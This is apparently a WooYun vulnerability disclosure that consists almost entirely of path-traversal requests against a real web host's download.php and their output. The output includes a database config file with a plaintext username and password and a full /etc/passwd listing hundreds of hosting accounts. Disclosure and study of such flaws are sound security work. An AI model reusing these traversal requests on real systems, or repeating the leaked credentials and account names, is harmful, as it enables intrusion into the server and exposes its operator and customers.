WooYun.org

http://**.**.**.**/download.php?file=../../public_html/download.php

http://**.**.**.**/download.php?file=../../public_html/conn.php

$sql_url = "localhost";
$sql_user = "tefohkd01_tefo";
$sql_pw = "YPx8OBjJ";
$db = "tefohkd01_tefo";

http://**.**.**.**/download.php?file=../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
avahi-autoipd:x:100:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
diradmin:x:101:104::/usr/local/directadmin:/bin/false
mysql:x:102:105:MySQL server:/var/lib/mysql:/bin/false
webapps:x:500:500::/var/www/html:/bin/false
majordomo:x:103:2::/etc/virtual/majordomo:/bin/false
dovecot:x:104:106::/home/dovecot:/bin/false
admin:x:501:501::/home/admin:/bin/bash
clamav:x:502:502:Clam AntiVirus:/home/clamav:/bin/false
evitationn:x:504:504::/home/evitationn:/bin/false
nelsonlam:x:506:506::/home/nelsonlam:/bin/false
petsfans:x:507:507::/home/petsfans:/bin/false
wacecom:x:508:508::/home/wacecom:/bin/false
hkctr:x:510:510::/home/hkctr:/bin/false
a06outdoor:x:511:511::/home/a06outdoor:/bin/false
a259dogcom:x:512:512::/home/a259dogcom:/bin/false
a4lumcom:x:514:514::/home/a4lumcom:/bin/false
a602sqnorg:x:515:515::/home/a602sqnorg:/bin/false
a810hk:x:516:516::/home/a810hk:/bin/false
a89268com:x:517:517::/home/a89268com:/bin/false
aaronkwanc:x:518:518::/home/aaronkwanc:/bin/false
affinityhk:x:520:520::/home/affinityhk:/bin/false
agiyam:x:521:521::/home/agiyam:/bin/false
ahbunnetdd:x:522:522::/home/ahbunnetdd:/bin/false
aisuinfo86:x:523:523::/home/aisuinfo86:/bin/false
alliancepl:x:525:525::/home/alliancepl:/bin/false
alnidvhked:x:526:526::/home/alnidvhked:/bin/false
alphaomega:x:527:527::/home/alphaomega:/bin/false
alucoicomb:x:528:528::/home/alucoicomb:/bin/false
amahk:x:529:529::/home/amahk:/bin/false
angelawong:x:530:530::/home/angelawong:/bin/false
assetcomhk:x:532:532::/home/assetcomhk:/bin/false
awingsstor:x:533:533::/home/awingsstor:/bin/false
azoniconce:x:535:535::/home/azoniconce:/bin/false
bandrmcom7:x:539:539::/home/bandrmcom7:/bin/false
batsaxcomd:x:540:540::/home/batsaxcomd:/bin/false
bhjsalumni:x:543:543::/home/bhjsalumni:/bin/false
bunnyspace:x:546:546::/home/bunnyspace:/bin/false
cardlandhk:x:547:547::/home/cardlandhk:/bin/false
cdpchkcom4:x:550:550::/home/cdpchkcom4:/bin/false
chuenoucom:x:552:552::/home/chuenoucom:/bin/false
coinshk:x:555:555::/home/coinshk:/bin/false
computerex:x:556:556::/home/computerex:/bin/false
cpchkcom77:x:557:557::/home/cpchkcom77:/bin/false
csklcomhk7:x:558:558::/home/csklcomhk7:/bin/false
cydhk7eb:x:561:561::/home/cydhk7eb:/bin/false
daisymaris:x:562:562::/home/daisymaris:/bin/false
derektam:x:564:564::/home/derektam:/bin/false
dfshipcom:x:565:565::/home/dfshipcom:/bin/false
directprin:x:566:566::/home/directprin:/bin/false
dirtbikehk:x:567:567::/home/dirtbikehk:/bin/false
dorothytsu:x:568:568::/home/dorothytsu:/bin/false
dphkcom:x:569:569::/home/dphkcom:/bin/false
easybidjap:x:570:570::/home/easybidjap:/bin/false
eottravelc:x:576:576::/home/eottravelc:/bin/false
euroasiatr:x:577:577::/home/euroasiatr:/bin/false
exoprocomh:x:578:578::/home/exoprocomh:/bin/false
firstricho:x:581:581::/home/firstricho:/bin/false
focallingc:x:582:582::/home/focallingc:/bin/false
frankieche:x:583:583::/home/frankieche:/bin/false
freetradeh:x:585:585::/home/freetradeh:/bin/false
fuhingnetc:x:586:586::/home/fuhingnetc:/bin/false
funfunhome:x:587:587::/home/funfunhome:/bin/false
fwicomhka6:x:589:589::/home/fwicomhka6:/bin/false
fwlcoscom8:x:590:590::/home/fwlcoscom8:/bin/false
gallerycar:x:591:591::/home/gallerycar:/bin/false
generalsma:x:592:592::/home/generalsma:/bin/false
giftattack:x:593:593::/home/giftattack:/bin/false
glamourppc:x:594:594::/home/glamourppc:/bin/false
goghproduc:x:596:596::/home/goghproduc:/bin/false
greaterchi:x:597:597::/home/greaterchi:/bin/false
hkacmcomhk:x:600:600::/home/hkacmcomhk:/bin/false
hkcagcom6f:x:601:601::/home/hkcagcom6f:/bin/false
hkcqbcom0a:x:602:602::/home/hkcqbcom0a:/bin/false
hkjcstaffc:x:603:603::/home/hkjcstaffc:/bin/false
hkparentsc:x:605:605::/home/hkparentsc:/bin/false
hksupreme2:x:606:606::/home/hksupreme2:/bin/false
hnhhkcom85:x:607:607::/home/hnhhkcom85:/bin/false
househknet:x:610:610::/home/househknet:/bin/false
hoyincoma6:x:612:612::/home/hoyincoma6:/bin/false
hvaahk945:x:613:613::/home/hvaahk945:/bin/false
icecreamus:x:614:614::/home/icecreamus:/bin/false
iceocomhkf:x:615:615::/home/iceocomhkf:/bin/false
ichinghkad:x:616:616::/home/ichinghkad:/bin/false
idphkea8:x:617:617::/home/idphkea8:/bin/false
indopacres:x:620:620::/home/indopacres:/bin/false
isohkcom13:x:623:623::/home/isohkcom13:/bin/false
johnsonspo:x:626:626::/home/johnsonspo:/bin/false
kagostudio:x:628:628::/home/kagostudio:/bin/false
keenscomhk:x:629:629::/home/keenscomhk:/bin/false
keyhouseco:x:630:630::/home/keyhouseco:/bin/false
kinsonstud:x:632:632::/home/kinsonstud:/bin/false
kitkwongco:x:633:633::/home/kitkwongco:/bin/false
kobonetcom:x:634:634::/home/kobonetcom:/bin/false
kpcomhke15:x:635:635::/home/kpcomhke15:/bin/false
lamto396:x:636:636::/home/lamto396:/bin/false
lanaturalb:x:638:638::/home/lanaturalb:/bin/false
laplamnet5:x:639:639::/home/laplamnet5:/bin/false
leechengin:x:640:640::/home/leechengin:/bin/false
leechk766:x:641:641::/home/leechk766:/bin/false
leonhartin:x:642:642::/home/leonhartin:/bin/false
leotpsorg3:x:643:643::/home/leotpsorg3:/bin/false
liberohkco:x:644:644::/home/liberohkco:/bin/false
locusdesig:x:645:645::/home/locusdesig:/bin/false
lpcorghk86:x:646:646::/home/lpcorghk86:/bin/false
lstcymck:x:647:647::/home/lstcymck:/bin/false
lujahgroup:x:649:649::/home/lujahgroup:/bin/false
macaopeopl:x:650:650::/home/macaopeopl:/bin/false
macaovoice:x:651:651::/home/macaovoice:/bin/false
mafaidesig:x:652:652::/home/mafaidesig:/bin/false
magicpoint:x:653:653::/home/magicpoint:/bin/false
maxngnetb4:x:654:654::/home/maxngnetb4:/bin/false
mayseecomh:x:655:655::/home/mayseecomh:/bin/false
milestonec:x:657:657::/home/milestonec:/bin/false
mmagicorga:x:659:659::/home/mmagicorga:/bin/false
moonspirit:x:661:661::/home/moonspirit:/bin/false
mulanhauco:x:662:662::/home/mulanhauco:/bin/false
mychairs:x:663:663::/home/mychairs:/bin/false
myroomzero:x:665:665::/home/myroomzero:/bin/false
neureuterc:x:669:669::/home/neureuterc:/bin/false
ngchikitco:x:670:670::/home/ngchikitco:/bin/false
ocom8d6:x:672:672::/home/ocom8d6:/bin/false
paperhse:x:675:675::/home/paperhse:/bin/false
pazucomd00:x:676:676::/home/pazucomd00:/bin/false
pennychann:x:677:677::/home/pennychann:/bin/false
poshpawsco:x:680:680::/home/poshpawsco:/bin/false
qooooocom:x:681:681::/home/qooooocom:/bin/false
quartsnet3:x:682:682::/home/quartsnet3:/bin/false
rainbowcar:x:683:683::/home/rainbowcar:/bin/false
recyclemsc:x:684:684::/home/recyclemsc:/bin/false
redsoundco:x:685:685::/home/redsoundco:/bin/false
righttimec:x:688:688::/home/righttimec:/bin/false
ripabharma:x:689:689::/home/ripabharma:/bin/false
rm204comc5:x:690:690::/home/rm204comc5:/bin/false
ronaldchen:x:691:691::/home/ronaldchen:/bin/false
rwowcomd21:x:693:693::/home/rwowcomd21:/bin/false
sdsccomhka:x:695:695::/home/sdsccomhka:/bin/false
shoppingth:x:696:696::/home/shoppingth:/bin/false
sqkhkabd:x:697:697::/home/sqkhkabd:/bin/false
starhscom0:x:698:698::/home/starhscom0:/bin/false
starmaxsta:x:699:699::/home/starmaxsta:/bin/false
straightco:x:701:701::/home/straightco:/bin/false
successpac:x:702:702::/home/successpac:/bin/false
takhoineta:x:705:705::/home/takhoineta:/bin/false
tdeccomhka:x:706:706::/home/tdeccomhka:/bin/false
teamacaune:x:707:707::/home/teamacaune:/bin/false
tefohkd01:x:708:708::/home/tefohkd01:/bin/false
tinwannewt:x:710:710::/home/tinwannewt:/bin/false
tradefirst:x:713:713::/home/tradefirst:/bin/false
ueihkcom:x:715:715::/home/ueihkcom:/bin/false
uniquemaca:x:716:716::/home/uniquemaca:/bin/false
vincentchi:x:718:718::/home/vincentchi:/bin/false
vitascomhk:x:719:719::/home/vitascomhk:/bin/false
weightron:x:721:721::/home/weightron:/bin/false
winstonlau:x:722:722::/home/winstonlau:/bin/false
wisecarehe:x:724:724::/home/wisecarehe:/bin/false
wyxhkfansc:x:727:727::/home/wyxhkfansc:/bin/false
ychzcorghk:x:731:731::/home/ychzcorghk:/bin/false
yglhkcom17:x:732:732::/home/yglhkcom17:/bin/false
ywyancom22:x:734:734::/home/ywyancom22:/bin/false
lowb:x:756:756::/home/lowb:/bin/false
offside:x:757:757::/home/offside:/bin/false
hkctr1:x:768:768::/home/hkctr1:/bin/false
gigilam:x:786:786::/home/gigilam:/bin/false
ishop1314:x:787:787::/home/ishop1314:/bin/false
jojolam:x:788:788::/home/jojolam:/bin/false
mschk:x:789:789::/home/mschk:/bin/false
ttgin:x:792:792::/home/ttgin:/bin/false
unitedadv:x:797:797::/home/unitedadv:/bin/false
carsonrack:x:799:799::/home/carsonrack:/bin/false
easytech:x:801:801::/home/easytech:/bin/false
printeasy:x:807:807::/home/printeasy:/bin/false
tinkee:x:808:808::/home/tinkee:/bin/false
wace:x:809:809::/home/wace:/bin/false
elastiquec:x:814:814::/home/elastiquec:/bin/false
citylinkco:x:835:835::/home/citylinkco:/bin/false
c9hk:x:840:840::/home/c9hk:/bin/false
webdesigne:x:843:843::/home/webdesigne:/bin/false
bmwines:x:857:857::/home/bmwines:/bin/false
hair163:x:888:888::/home/hair163:/bin/false
metta:x:916:916::/home/metta:/bin/false
nelson:x:921:921::/home/nelson:/bin/false
nomeahk:x:922:922::/home/nomeahk:/bin/false
nomeaus:x:924:924::/home/nomeaus:/bin/false
nomeawatch:x:925:925::/home/nomeawatch:/bin/false
phg:x:929:929::/home/phg:/bin/false
pyjewelry:x:931:931::/home/pyjewelry:/bin/false
readerfanc:x:932:932::/home/readerfanc:/bin/false
splendid:x:948:948::/home/splendid:/bin/false
steveso1:x:949:949::/home/steveso1:/bin/false
steveso2:x:950:950::/home/steveso2:/bin/false
steveso3:x:951:951::/home/steveso3:/bin/false
touchup:x:955:955::/home/touchup:/bin/false
tours:x:956:956::/home/tours:/bin/false
ultim8:x:957:957::/home/ultim8:/bin/false
usagi:x:958:958::/home/usagi:/bin/false
wintex:x:966:966::/home/wintex:/bin/false
onlinshop1:x:979:979::/home/onlinshop1:/bin/false
onlinshop2:x:982:982::/home/onlinshop2:/bin/false
onlinshop4:x:984:984::/home/onlinshop4:/bin/false
onlinshop5:x:985:985::/home/onlinshop5:/bin/false
poman:x:988:988::/home/poman:/bin/false
ricochet:x:989:989::/home/ricochet:/bin/false
zemingtea:x:992:992::/home/zemingtea:/bin/false
living:x:994:994::/home/living:/bin/false
mah:x:996:996::/home/mah:/bin/false
soh:x:997:997::/home/soh:/bin/false
hair163seo:x:1014:1014::/home/hair163seo:/bin/false
moneyworth:x:1026:1026::/home/moneyworth:/bin/false
music:x:1027:1027::/home/music:/bin/false
nomeaccohk:x:1028:1028::/home/nomeaccohk:/bin/false
pulsefitne:x:1029:1029::/home/pulsefitne:/bin/false
reducefatc:x:1030:1030::/home/reducefatc:/bin/false
seeinart:x:1031:1031::/home/seeinart:/bin/false
shapebody:x:1032:1032::/home/shapebody:/bin/false
shipping:x:1033:1033::/home/shipping:/bin/false
sunflower:x:1034:1034::/home/sunflower:/bin/false
tcmakeup:x:1035:1035::/home/tcmakeup:/bin/false
virtoffice:x:1036:1036::/home/virtoffice:/bin/false
nomoresing:x:1042:1042::/home/nomoresing:/bin/false
pvbc2:x:1043:1043::/home/pvbc2:/bin/false
webdesigtc:x:1046:1046::/home/webdesigtc:/bin/false
theboard:x:1048:1048::/home/theboard:/bin/false
lotchware:x:1052:1052::/home/lotchware:/bin/false
lotchsuppl:x:1053:1053::/home/lotchsuppl:/bin/false
victorps:x:1054:1054::/home/victorps:/bin/false
jafoon:x:1059:1059::/home/jafoon:/bin/false
cacenter:x:1061:1061::/home/cacenter:/bin/false
hos:x:1071:1071::/home/hos:/bin/false
grandhealt:x:1078:1078::/home/grandhealt:/bin/false
businesspl:x:1079:1079::/home/businesspl:/bin/false
campbell:x:1094:1094::/home/campbell:/bin/false
ecohome:x:1095:1095::/home/ecohome:/bin/false
lifecomm:x:1098:1098::/home/lifecomm:/bin/false
webdesign:x:1101:1101::/home/webdesign:/bin/false
onetechhkc:x:1105:1105::/home/onetechhkc:/bin/false
buybusines:x:1115:1115::/home/buybusines:/bin/false
movectr2:x:1119:1119::/home/movectr2:/bin/false
jacson:x:1132:1132::/home/jacson:/bin/false
violin:x:1138:1138::/home/violin:/bin/false
greylistd:x:105:107:Greylisting deamon:/var/lib/greylistd:/sbin/nologin
onetech:x:1151:1151::/home/onetech:/bin/false
forsyth:x:1152:1152::/home/forsyth:/bin/false
edendiscus:x:1154:1154::/home/edendiscus:/bin/false
gianttesti:x:1157:1157::/home/gianttesti:/bin/false
chrishum:x:1158:1158::/home/chrishum:/bin/false
food:x:1166:1166::/home/food:/bin/false
mffont:x:1177:1177::/home/mffont:/bin/false
kinson:x:1178:1178::/home/kinson:/bin/false
tkdsystem:x:1179:1179::/home/tkdsystem:/bin/false
orionarm:x:1180:1180::/home/orionarm:/bin/false
espuma:x:1181:1181::/home/espuma:/bin/false
edtkd:x:1182:1182::/home/edtkd:/bin/false
cvtower:x:1183:1183::/home/cvtower:/bin/false
tamuta:x:1185:1185::/home/tamuta:/bin/false
everhonor:x:1186:1186::/home/everhonor:/bin/false
shooting5:x:1189:1189::/home/shooting5:/bin/false
ball3:x:1191:1191::/home/ball3:/bin/false
debts:x:1194:1194::/home/debts:/bin/false
neoprohk:x:1195:1195::/home/neoprohk:/bin/false
tamodacom:x:1196:1196::/home/tamodacom:/bin/false
mental123:x:1197:1197::/home/mental123:/bin/false
swgaeashop:x:1198:1198::/home/swgaeashop:/bin/false
hangfunghk:x:1199:1199::/home/hangfunghk:/bin/false
xmarket:x:1202:1202::/home/xmarket:/bin/false
eeemotion:x:1203:1203::/home/eeemotion:/bin/false
hkctrcc:x:1205:1205::/home/hkctrcc:/bin/false
cashflow:x:1206:1206::/home/cashflow:/bin/false
gkts:x:1207:1207::/home/gkts:/bin/false
ef7com:x:1208:1208::/home/ef7com:/bin/false
hkahhk:x:1209:1209::/home/hkahhk:/bin/false
hkaheng:x:1211:1211::/home/hkaheng:/bin/false
snuface:x:1212:1212::/home/snuface:/bin/false
mah123:x:1213:1213::/home/mah123:/bin/false
foster:x:1215:1215::/home/foster:/bin/false
justbcom:x:1218:1218::/home/justbcom:/bin/false
maheng:x:1219:1219::/home/maheng:/bin/false
pmca:x:1221:1221::/home/pmca:/bin/false
clubleague:x:1222:1222::/home/clubleague:/bin/false
successmkt:x:1224:1224::/home/successmkt:/bin/false
zzsoncom:x:1226:1226::/home/zzsoncom:/bin/false
embactr:x:1227:1227::/home/embactr:/bin/false
nsconcept:x:1229:1229::/home/nsconcept:/bin/false
hk5gctr:x:1230:1230::/home/hk5gctr:/bin/false
hk5gcom:x:1231:1231::/home/hk5gcom:/bin/false
eshop:x:1232:1232::/home/eshop:/bin/false
femcaremed:x:1233:1233::/home/femcaremed:/bin/false
test1:x:1234:1234::/home/test1:/bin/false